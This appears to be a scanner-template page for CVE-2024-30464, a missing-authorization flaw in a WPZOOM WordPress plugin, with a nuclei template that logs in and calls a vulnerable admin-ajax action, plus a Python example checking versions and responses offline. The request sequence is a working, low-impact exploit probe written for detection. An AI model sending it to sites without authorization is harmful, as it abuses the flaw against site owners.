
WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization

CVE-2024-30464
Verified

Description

WPZOOM Social Icons Widget & Block versions up to and including 4.2.15 are missing an authorization check (insufficient access control in the widget and block code), so an authenticated user can perform actions they are not entitled to. The template below exercises the zoom_ajax_set_pointer_transient admin-ajax action, which a logged-in low-privileged user can call to set a WordPress transient with an arbitrary name and lifetime. The only precondition is a valid account on the site (CVSS PR:L); no other special conditions apply.

Severity

Medium

CVSS Score

4.3

Exploit Probability

42%

Affected Product

social-icons-widget-by-wpzoom

Published Date

March 13, 2026

Template Author

pussycat0x

CVE-2024-30464.yaml
id: CVE-2024-30464

info:
  name: WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
  author: pussycat0x
  severity: medium
  description: |
    WPZOOM Social Icons Widget & Block versions up to and including 4.2.15 are missing an authorization check (insufficient access control in the widget and block code), so an authenticated user can perform actions they are not entitled to. The zoom_ajax_set_pointer_transient admin-ajax action exercised below lets a logged-in low-privileged user set a WordPress transient with an arbitrary name and lifetime. The only precondition is a valid account on the site (CVSS PR:L).
  impact: |
    An authenticated low-privileged user can set arbitrary WordPress transients (chosen name and lifetime), an integrity-only impact (CVSS C:N/I:L/A:N); no confidentiality loss or privilege escalation is established.
  remediation: |
    Update to version 4.2.16 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-30464
    epss-score: 0.41698
    epss-percentile: 0.9747
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 4
    vendor: wpzoom
    product: social-icons-widget-by-wpzoom
    framework: wordpress
    publicwww-query: "/plugins/social-icons-widget-by-wpzoom/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,wpzoom,authenticated

variables:
  rand: "{{rand_int(10000, 99999)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "compare_versions(version, '<= 4.2.15')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=zoom_ajax_set_pointer_transient&transient_name={{rand}}&lifetime=3600

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body,"Done, transient is set") && contains(body,"success\":true")'
        condition: and
# digest: 490a0046304402204b1f184b4612bb45748d67e352d007f03d59c4668cdb1a2448e069a55879a9fe0220011c7f7dba4c77c6c575a3159517aa9cd7dd2e04b94c9832bb276872211c261d:922c64590222798bb761d5b6d8e72950
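The template above has two gates: it reads the version advertised in readme.txt and only then logs in and calls the admin-ajax action, matching on the reply. The Python below is an added example that reimplements both gates offline so the logic can be checked without a target; it is not part of the nuclei template and not WPZOOM's code. The readme excerpts and admin-ajax replies are constructed for the example (nothing about the plugin's real response beyond the two strings the template matches is assumed). It also makes two caveats explicit: the extractor's digits-only pattern does not match a readme that says "Stable tag: trunk", so on such a site the flow stops silently at the first request, and version strings must be compared component-wise rather than lexically (string order puts 4.2.9 after 4.2.15).

```python
"""Offline reimplementation of the two gates in the CVE-2024-30464 template.

Added example, not the template author's or WPZOOM's code.  The sample
readme bodies and admin-ajax replies below are constructed for the example.
"""
import re
from urllib.parse import urlencode

AFFECTED_MAX = "4.2.15"            # last vulnerable release per the advisory
AJAX_ACTION = "zoom_ajax_set_pointer_transient"

# Same pattern as the template's extractor: digits and dots only.
STABLE_TAG_RE = re.compile(r"Stable tag: ([0-9.]+)")


def extract_stable_tag(readme_body):
    """Version from a plugin readme.txt body, or None when absent.

    Caveat: a readme that says 'Stable tag: trunk' yields None, and the
    nuclei flow then stops at http(1) without reporting anything.
    """
    m = STABLE_TAG_RE.search(readme_body)
    return m.group(1) if m else None


def version_tuple(v):
    """'4.2.15' -> (4, 2, 15); a trailing dot is tolerated."""
    return tuple(int(p) for p in v.strip(".").split("."))


def is_affected(version, max_affected=AFFECTED_MAX):
    """version <= max_affected, compared component-wise (4.2.9 < 4.2.15)."""
    if version is None:
        return False
    a, b = version_tuple(version), version_tuple(max_affected)
    n = max(len(a), len(b))
    a += (0,) * (n - len(a))        # treat 4.2 as 4.2.0
    b += (0,) * (n - len(b))
    return a <= b


def build_probe_body(transient_name, lifetime=3600):
    """Form body the template POSTs to /wp-admin/admin-ajax.php in step 3."""
    return urlencode({"action": AJAX_ACTION,
                      "transient_name": transient_name,
                      "lifetime": lifetime})


def ajax_reply_indicates_vuln(status_code, body):
    """The template's final matcher: HTTP 200 plus both marker strings."""
    return (status_code == 200
            and "Done, transient is set" in body
            and 'success":true' in body)


def assess(readme_body, ajax_status=None, ajax_body=None):
    """Combine the gates the way 'flow: http(1) && http(2)' does."""
    version = extract_stable_tag(readme_body)
    if version is None:
        return "version-unknown"     # e.g. 'Stable tag: trunk'
    if not is_affected(version):
        return "patched"
    if ajax_status is None:
        return "candidate"           # in range, authenticated probe not sent
    if ajax_reply_indicates_vuln(ajax_status, ajax_body or ""):
        return "confirmed"
    return "not-confirmed"


# Constructed samples (not captured from a real site).
SAMPLE_README_VULN = ("=== Social Icons Widget & Block by WPZOOM ===\n"
                      "Requires at least: 5.0\nStable tag: 4.2.15\n")
SAMPLE_README_FIXED = "Stable tag: 4.2.16\n"
SAMPLE_README_TRUNK = "Stable tag: trunk\n"
SAMPLE_AJAX_OK = '{"success":true,"data":"Done, transient is set"}'
SAMPLE_AJAX_DENIED = '{"success":false}'     # shape only; wording is assumed

if __name__ == "__main__":
    print(build_probe_body("poc12345"))
    for label, readme, st, body in [
        ("vulnerable, probe ok", SAMPLE_README_VULN, 200, SAMPLE_AJAX_OK),
        ("vulnerable, probe denied", SAMPLE_README_VULN, 403, SAMPLE_AJAX_DENIED),
        ("patched", SAMPLE_README_FIXED, None, None),
        ("trunk readme", SAMPLE_README_TRUNK, None, None),
    ]:
        print(f"{label}: {assess(readme, st, body)}")
```

Running the file prints the verdicts for the constructed samples. Against a site you are authorised to assess, pass the body of /wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt to extract_stable_tag and the admin-ajax response (status and body) to ajax_reply_indicates_vuln; the "version-unknown" verdict is the case the nuclei template cannot distinguish from "not vulnerable".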

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVE ID:
CVE-2024-30464
CWE ID:
CWE-862

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization

Remediation Steps

Update to version 4.2.16 or later.